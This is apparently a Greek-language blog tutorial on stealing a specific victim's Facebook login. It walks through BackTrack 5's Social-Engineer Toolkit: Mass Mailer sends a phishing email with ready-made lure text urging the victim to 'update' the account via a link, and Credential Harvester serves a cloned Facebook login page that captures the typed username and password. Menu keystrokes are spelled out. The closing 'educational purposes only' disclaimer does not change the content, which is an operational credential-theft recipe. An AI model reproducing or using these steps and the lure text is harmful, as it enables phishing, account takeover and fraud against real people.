Σε αυτό το post θα εξηγήσω πως μπορούμε να αποκτήσουμε το Username και το Password του λογαριασμού του στο Facebook.
Για να το πραγματοποιήσουμε θα χρειαστούμε 2 εργαλεία που εμπεριέχονται στο λειτουργικό σύστημα BackTrack 5.
Πρόκειται:
Α) Για το Mass Mailer
Β) Το Harvester Attack Vector
Με
το πρώτο στέλνω email στο θύμα μου με το link του κλώνου της εισόδου
της σελιδας του Facebook (δημιουργία Fake site). Και αφού κάνω αυτό μετά
χρησιμοποιώ το Harvester Attack Vector.
Terminal: cd pentest/exploits/set ↵
./set ↵
*Αυτό
μπορεί να γίνει και από το μενού του backtrack 5 ακολουθόντας τη
διαδρομή Bt5 --> explotation tools --> social engineering tools
--> set
Α) Χρησιμοποίηση του Mass Mailer για αποστολή μυνήματος στο θύμα...
Terminal: 5 ↵ [Mass Mailer Attack]
1 ↵ [E-Mail Attack Single E-mail Address]
Enter who you want to send e-mail to: victim_e-mail@gmail.com ↵
1 ↵ [Enter my_e-mail@hotmail.com]
[Enter my password e-mail]
Enter subject of your email: Reminder ↵
1 ↵ [HTML] or 2 ↵ [Plain] --> Επιλέγω 2 ↵
Next line of the body: This message is an important for your facebook
account health. Please update your account so that we present it for
hacking attacks. Please follow the link below to update your account.
http://(my ip address)
Regards
^C ↵ (Ctrl + C)
Αυτό
που καταφέραμε να κάνουμε με το Mass Mailer είναι να στείλουμε ένα
μήνυμα στο θύμα στο οποίο του λέμε να μπεί και να κάνει επιβεβαίωση το
λογαριασμό του.
Β) Σε αυτό το στάδιο χρησιμοποιούμε το Credential Harvester Attack.
Terminal: cd pentest/exploits/set ↵
./set ↵
*Αυτό
μπορεί να γίνει και από το μενού του backtrack 5 ακολουθόντας τη
διαδρομή Bt5 --> explotation tools --> social engineering tools
--> set
Στη συνέχεια ακολουθούμε:
Terminal: 2 ↵
3 ↵
1 ↵
4 ↵
Στο
σημείο αυτό θα μας βγάλει ''Press {return} to continue'' πατάμε enter
και μας βγάζει τρεις σειρές με μπλε γράμματα. Όταν το θύμα ανοίξει το
link που του στείλαμε τότε ανοίγει η σελίδα του κλώνου του facebook που
δημιουργήσαμε και αυτός όταν πληκτρολογίσει το username – password τότε
κοιτάμε στο terminal και μας δείχνει τι πληκτρολόγισε. Έτσι αποκτάμε
πρόσβαση στο λογαριασμό του.
ΠΡΟΣΟΧΗ!
Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε
φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση
και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε
παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.
0 σχόλια:
Δημοσίευση σχολίου
Σημείωση: Μόνο ένα μέλος αυτού του ιστολογίου μπορεί να αναρτήσει σχόλιο.